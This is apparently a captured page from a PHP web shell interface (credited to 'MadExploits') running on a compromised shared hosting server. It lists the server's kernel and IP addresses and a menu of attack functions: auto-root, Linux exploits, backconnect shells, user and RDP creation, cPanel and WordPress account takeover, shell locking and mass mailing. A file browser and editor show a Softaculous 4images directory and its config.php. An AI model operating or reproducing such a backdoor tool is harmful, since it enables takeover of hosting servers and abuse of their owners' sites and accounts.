Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 18.190.153.77
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
4images /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
clone.php
2.52
KB
-rw-r--r--
config.php
1.59
KB
-rw-r--r--
edit.php
4.36
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
377
B
-rw-r--r--
import.php
3.16
KB
-rw-r--r--
info.xml
5.57
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
5.18
KB
-rw-r--r--
install.xml
1.31
KB
-rw-r--r--
md5
1002
B
-rw-r--r--
notes.txt
116
B
-rw-r--r--
upgrade.php
2.43
KB
-rw-r--r--
upgrade.xml
250
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.php
<?php /************************************************************************** * * * 4images - A Web Based Image Gallery Management System * * ---------------------------------------------------------------- * * * * File: config.php * * Copyright: (C) 2002-2023 4homepages.de * * Email: 4images@4homepages.de * * Web: http://www.4homepages.de * * Scriptversion: 1.10 * * * * Dieses Script ist KEINE Freeware. Bitte lesen Sie die Lizenz- * * bedingungen (Lizenz.txt) für weitere Informationen. * * --------------------------------------------------------------- * * This script is NOT freeware! Please read the Copyright Notice * * (Licence.txt) for further information. * * * *************************************************************************/ date_default_timezone_set("America/New_York"); $db_servertype = "mysqli"; $db_host = "[[softdbhost]]"; $db_name = "[[softdb]]"; $db_user = "[[softdbuser]]"; $db_password = "[[softdbpass]]"; $table_prefix = "[[dbprefix]]"; define("4IMAGES_ACTIVE", 1); ?>
Close